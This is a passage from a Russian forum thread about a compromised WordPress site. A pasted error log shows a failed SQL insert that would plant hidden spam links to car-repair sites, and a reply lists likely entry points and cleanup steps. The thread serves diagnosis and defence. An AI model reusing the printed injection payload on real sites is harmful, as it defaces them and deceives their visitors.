med-2013.ru [Sun Jul 20 15:46:18 2014] [error] [client 66.249.78.23] \xd0\x91\xd0\xb0\xd0\xb7\xd0\xb0 \xd0\xb4\xd0\xb0\xd0\xbd\xd0\xbd\xd1\x8b\xd1\x85 WordPress \xd0\xb2\xd0\xbe\xd0\xb7\xd0\xb2\xd1\x80\xd0\xb0\xd1\x82\xd0\xb8\xd0\xbb\xd0\xb0 \xd0\xbe\xd1\x88\xd0\xb8\xd0\xb1\xd0\xba\xd1\x83 Unknown column 'blog_id' in 'field list' \xd0\xb2 \xd0\xbe\xd1\x82\xd0\xb2\xd0\xb5\xd1\x82 \xd0\xbd\xd0\xb0 \xd0\xb7\xd0\xb0\xd0\xbf\xd1\x80\xd0\xbe\xd1\x81 INSERT INTO wp_options ( option_id, blog_id, option_name,option_value,autoload ) VALUES ( 9999,0, '1405856778', '<div style=\\"display:none;\\">\xd0\x9a\xd0\xbd\xd0\xb8\xd0\xb3\xd0\xb8 \xd0\xbc\xd0\xbe\xd0\xb6\xd0\xbd\xd0\xbe \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb8\xd1\x82\xd0\xb0\xd1\x82\xd1\x8c \xd0\xbd\xd0\xb0 \xd1\x81\xd0\xb0\xd0\xb9\xd1\x82\xd0\xb5 <a href=\\"http://bookroute.ru\\" target=\\"_blank\\">bookroute.ru</a> \xd0\xbe\xd1\x82 \xd0\xbb\xd1\x8e\xd0\xb1\xd1\x8b\xd1\x85 \xd0\xb8\xd0\xb7\xd0\xb2\xd0\xb5\xd1\x81\xd1\x82\xd0\xbd\xd1\x8b\xd1\x85 \xd0\xb0\xd0\xb2\xd1\x82\xd0\xbe\xd1\x80\xd0\xbe\xd0\xb2.</div> <div style=\\"display:none;\\">\xd0\xaf \xd1\x80\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb8\xd1\x80\xd1\x83\xd1\x8e \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb9 \xd0\xb0\xd0\xb2\xd1\x82\xd0\xbe\xd0\xbc\xd0\xbe\xd0\xb1\xd0\xb8\xd0\xbb\xd1\x8c \xd0\xbf\xd0\xbe \xd1\x80\xd0\xb5\xd0\xba\xd0\xbe\xd0\xbc\xd0\xb5\xd0\xbd\xd0\xb4\xd0\xb0\xd1\x86\xd0\xb8\xd1\x8f\xd0\xbc \xd1\x81 \xd0\xbf\xd0\xbe\xd1\x80\xd1\x82\xd0\xb0\xd0\xbb\xd0\xb0 <a href=\\"http://autoaccident.ru\\" target=\\"_blank\\">autoaccident.ru</a> \xd0\xb3\xd0\xb4\xd0\xb5 \xd1\x81\xd0\xbe\xd0\xb4\xd0\xb5\xd1\x80\xd0\xb6\xd0\xb8\xd1\x82\xd1\x81\xd1\x8f \xd0\xbc\xd0\xb0\xd1\x81\xd1\x81\xd0\xb0 \xd0\xbf\xd0\xbe\xd0\xbb\xd0\xb5\xd0\xb7\xd0\xbd\xd0\xbe\xd0\xb9 \xd0\xb8\xd0\xbd\xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8.</div> <div style=\\"display:none;\\">\xd0\x95\xd1\x81\xd0\xbb\xd0\xb8 \xd1\x82\xd0\xb2\xd0\xbe\xd1\x8f \xd0\xbb\xd0\xb0\xd1\x81\xd1\x82\xd0\xbe\xd1\x87\xd0\xba\xd0\xb0 \xd0\xbf\xd0\xbe\xd0\xbb\xd0\xbe\xd0\xbc\xd0\xb0\xd0\xbb\xd0\xb0\xd1\x81\xd1\x8c, \xd1\x82\xd0\xbe \xd0\xbf\xd0\xbe\xd1\x81\xd0\xbc\xd0\xbe\xd1\x82\xd1\x80\xd0\xb8 <a href=\\"http://autoanalyze.ru\\" target=\\"_blank\\">autoanalyze.ru</a> - \xd1\x82\xd0\xb0\xd0\xbc \xd0\xbc\xd0\xb0\xd1\x81\xd1\x81\xd0\xb0 \xd0\xb8\xd0\xbd\xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8 \xd0\xbe \xd1\x80\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5 \xd0\xbc\xd0\xb0\xd1\x88\xd0\xb8\xd0\xbd\xd1\x8b.</div> <div style=\\"display:none;\\">\xd0\x9c\xd1\x83\xd0\xb6\xd0\xb8\xd0\xba\xd0\xb8 \xd0\xbf\xd0\xbe\xd1\x81\xd0\xbe\xd0\xb2\xd0\xb5\xd1\x82\xd1\x83\xd0\xb9\xd1\x82\xd0\xb5 \xd0\xbc\xd0\xbe\xd0\xb6\xd0\xbd\xd0\xbe \xd0\xbb\xd0\xb8 \xd0\xb8\xd1\x81\xd0\xbf\xd0\xbe\xd0\xbb\xd1\x8c\xd0\xb7\xd0\xbe\xd0\xb2\xd0\xb0\xd1\x82\xd1\x8c \xd0\xb8\xd0\xbd\xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x86\xd0\xb8 \xd1\x81 \xd0\xb8\xd0\xbd\xd1\x82\xd0\xb5\xd1\x80\xd0\xbd\xd0\xb5\xd1\x82 \xd1\x80\xd0\xb5\xd1\x81\xd1\x83\xd1\x80\xd1\x81\xd0\xb0 <a href=\\"http://autocorrect.ru\\" target=\\"_blank\\">autocorrect.ru</a> \xd0\xb4\xd0\xbb\xd1\x8f \xd1\x82\xd0\xbe\xd0\xb3\xd0\xbe, \xd1\x87\xd1\x82\xd0\xbe\xd0\xb1\xd1\x8b \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb8\xd0\xbd\xd0\xb8\xd1\x82\xd1\x8c \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb9 \xd0\xb2\xd0\xb0\xd0\xb7 2110?</div> <div style=\\"display:none;\\">\xd0\xaf \xd1\x80\xd0\xb5\xd1\x88\xd0\xb8\xd0\xbb \xd0\xb4\xd0\xbb\xd1\x8f \xd1\x81\xd0\xb5\xd0\xb1\xd1\x8f \xd1\x87\xd1\x82\xd0\xbe \xd0\xb1\xd1\x83\xd0\xb4\xd1\x83 \xd1\x83\xd1\x87\xd0\xb8\xd1\x82\xd1\x8c\xd1\x81\xd1\x8f \xd1\x80\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xbd\xd1\x82\xd1\x83 \xd1\x81 \xd1\x81\xd0\xb0\xd0\xb9\xd1\x82\xd0\xb0 <a href=\\"http://autodefect.ru\\" target=\\"_blank\\">autodefect.ru</a>, \xd0\xba\xd0\xbe\xd1\x82\xd0\xbe\xd1\x80\xd1\x8b\xd0\xb9 \xd1\x81\xd0\xbe\xd0\xb4\xd0\xb5\xd1\x80\xd0\xb6\xd0\xb8\xd1\x82 \xd0\xbe\xd0\xb1\xd1\x88\xd0\xb8\xd1\x80\xd0\xbd\xd1\x83\xd1\x8e \xd0\xb1\xd0\xb0\xd0\xb7\xd1\x83 \xd0\xb8\xd0\xbd\xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8.</div> <div style=\\"display:none;\\">\xd0\x92\xd0\xbe\xd1\x82 \xd1\x82\xd1\x83\xd1\x82 - <a href=\\"http://autoglitch.ru\\" target=\\"_blank\\">autoglitch.ru</a> \xd1\x83\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbb, \xd0\xba\xd0\xb0\xd0\xba \xd0\xbd\xd0\xb0\xd0\xba\xd0\xbe\xd0\xbd\xd0\xb5\xd1\x86 \xd1\x82\xd0\xbe \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb8\xd0\xbd\xd0\xb8\xd1\x82\xd1\x8c \xd0\xbf\xd0\xb5\xd1\x87\xd0\xba\xd1\x83 \xd0\xbd\xd0\xb0 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb5\xd0\xb9 \xd0\xbf\xd1\x80\xd0\xb8\xd0\xbe\xd1\x80\xd0\xb5!</div> <div style=\\"display:none;\\">\xd0\x9c\xd0\xbe\xd0\xb9 \xd0\x9b\xd0\xb0\xd1\x80\xd0\xb3\xd1\x83\xd1\x81 \xd0\xbd\xd0\xb5 \xd0\xb7\xd0\xb0\xd0\xb2\xd0\xbe\xd0\xb4\xd0\xb8\xd1\x82\xd1\x81\xd1\x8f \xd0\xb8 \xd1\x8f \xd0\xbf\xd1\x80\xd0\xbe\xd1\x87\xd0\xb8\xd1\x82\xd0\xb0\xd0\xbb \xd0\xbd\xd0\xb0 <a href=\\"http://autooverhaul.ru\\" target=\\"_blank\\"autooverhaul.ru></a> \xd0\xbe \xd1\x82\xd0\xbe\xd0\xbc, \xd1\x87\xd1\x82\xd0\xbe \xd0\xbd\xd1\x83\xd0\xb6\xd0\xbd\xd0\xbe \xd1\x81\xd0\xb4\xd0\xb5\xd0\xbb\xd0\xb0\xd1\x82\xd1\x8c.. \xd0\xb8 \xd0\xbe\xd0\xbd\xd0\xb0 \xd0\xbf\xd0\xbe\xd0\xb5\xd1\x85\xd0\xb0\xd0\xbb\xd0\xb0!</div> <div style=\\"display:none;\\">\xd0\x9f\xd1\x80\xd0\xbe\xd1\x84\xd0\xb5\xd1\x81\xd1\x81\xd0\xb8\xd0\xbe\xd0\xbd\xd0\xb0\xd0\xbb\xd1\x8c\xd0\xbd\xd0\xb0\xd1\x8f \xd0\xbf\xd0\xbe\xd0\xbc\xd0\xbe\xd1\x89\xd1\x8c \xd0\xb4\xd0\xbb\xd1\x8f \xd0\xb2\xd0\xb0\xd1\x88\xd0\xb5\xd0\xb3\xd0\xbe \xd0\xb6\xd0\xb5\xd0\xbb\xd0\xb5\xd0\xb7\xd0\xbd\xd0\xbe\xd0\xb3\xd0\xbe \xd0\xb4\xd1\x80\xd1\x83\xd0\xb3\xd0\xb0 - <a href=\\"http://autoproceed.ru\\" target=\\"_blank\\">autoproceed.ru</a> - \xd1\x82\xd0\xbe\xd0\xbb\xd1\x8c\xd0\xba\xd0\xbe \xd0\xb0\xd0\xba\xd1\x82\xd1\x83\xd0\xb0\xd0\xbb\xd1\x8c\xd0\xbd\xd0\xb0\xd1\x8f \xd0\xb8\xd0\xbd\xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x86\xd0\xb8\xd1\x8f.</div> <div style=\\"display:none;\\">\xd0\x9d\xd1\x83 \xd1\x8f \xd1\x82\xd0\xb0\xd0\xba \xd0\xb8 \xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbb, \xd1\x87\xd1\x82\xd0\xbe \xd0\xb7\xd0\xb4\xd0\xb5\xd1\x81\xd1\x8c <a href=\\"http://autorefit.ru\\" target=\\"_blank\\">autorefit.ru</a> \xd1\x8f \xd0\xba\xd0\xb0\xd0\xba \xd0\xbe\xd0\xb1\xd1\x8b\xd1\x87\xd0\xbd\xd0\xbe \xd0\xbd\xd0\xb0\xd0\xb9\xd0\xb4\xd1\x83 \xd0\xbe\xd1\x82\xd0\xb2\xd0\xb5\xd1\x82, \xd0\xba\xd0\xb0\xd0\xba \xd0\xb7\xd0\xb0\xd0\xbc\xd0\xb5\xd0\xbd\xd0\xb8\xd1\x82\xd1\x8c \xd1\x84\xd0\xb0\xd1\x80\xd1\x8b \xd0\xbd\xd0\xb0 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb5\xd0\xb9 \xd0\x9a\xd0\xb0\xd0\xbb\xd0\xb8\xd0\xbd\xd0\xb5.</div> <div style=\\"display:none;\\">\xd0\xa7\xd0\xb8\xd1\x82\xd0\xb0\xd0\xb9\xd1\x82\xd0\xb5 \xd0\xbc\xd0\xbe\xd0\xb8 \xd1\x80\xd0\xb5\xd0\xba\xd0\xbe\xd0\xbc\xd0\xb5\xd0\xbd\xd0\xb4\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8 \xd0\xbe \xd1\x80\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb0 \xd0\xb0\xd0\xb2\xd1\x82\xd0\xbe \xd0\xbd\xd0\xb0 \xd0\xbf\xd0\xbe\xd1\x80\xd1\x82\xd0\xb0\xd0\xbb\xd0\xb5 <a href=\\"http://carrenovation.ru\\" target=\\"_blank\\">carrenovation.ru</a> - \xd1\x8f \xd1\x82\xd0\xb0\xd0\xbc \xd0\xbf\xd1\x83\xd0\xb1\xd0\xbb\xd0\xb8\xd0\xba\xd1\x83\xd1\x8e \xd1\x81\xd1\x82\xd0\xb0\xd1\x82\xd1\x8c\xd0\xb8.</div> <div style=\\"display:none;\\">\xd0\x9f\xd0\xbe\xd0\xb4\xd0\xb2\xd0\xb5\xd1\x81\xd0\xba\xd0\xb0 \xd0\xbf\xd0\xbe\xd0\xbb\xd0\xb5\xd1\x82\xd0\xb5\xd0\xbb\xd0\xb0 \xd0\xb8 \xd1\x81\xd1\x82\xd0\xb0\xd0\xbb\xd0\xb8 \xd1\x81\xd1\x82\xd1\x83\xd1\x87\xd0\xb0\xd1\x82\xd1\x8c \xd1\x81\xd1\x82\xd0\xbe\xd0\xb9\xd0\xba\xd0\xb8 \xd1\x81\xd0\xb7\xd0\xb0\xd0\xb4\xd0\xb8 \xd0\xb8 \xd1\x8f \xd0\xbd\xd0\xb0\xd1\x88\xd0\xb5\xd0\xbb \xd0\xbd\xd0\xb0 <a href=\\"http://carsbetter.ru\\" target=\\"_blank\\">carsbetter.ru</a> \xd0\xba\xd0\xb0\xd0\xba \xd1\x81\xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb8\xd1\x82\xd1\x8c\xd1\x81\xd1\x8f \xd1\x81 \xd1\x8d\xd1\x82\xd0\xbe\xd0\xb9 \xd0\xbf\xd1\x80\xd0\xbe\xd0\xb1\xd0\xbb\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xb9.</div> <div style=\\"display:none;\\">\xd0\x9f\xd0\xbe\xd0\xbf\xd1\x80\xd0\xbe\xd0\xb1\xd1\x83\xd0\xb9 \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb8\xd1\x82\xd0\xb0\xd1\x82\xd1\x8c \xd0\xbd\xd0\xb0 \xd0\xbf\xd0\xbe\xd1\x80\xd1\x82\xd0

63

Lord_Leon

20 июля 2014, 17:33

#10

sea_dream, wp ломается многими способами. И через дырявые плагины и дырявую тему, могут картинки закачать с вирусом, наиболее сейчас распространенный - это через xmlrpc.php.

Ставьте тему по умолчанию, отключите все плагины - смотрите запросы в логах, особенно запросы POST.

Решал проблему только закрытием внешнего доспута по ftp. Так как не был уверен, что ломанули только сайт клиента, а не хостинг вообще (сервер у провайдера). 😡

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов

Что делать, чтобы попасть в ответы Google Bard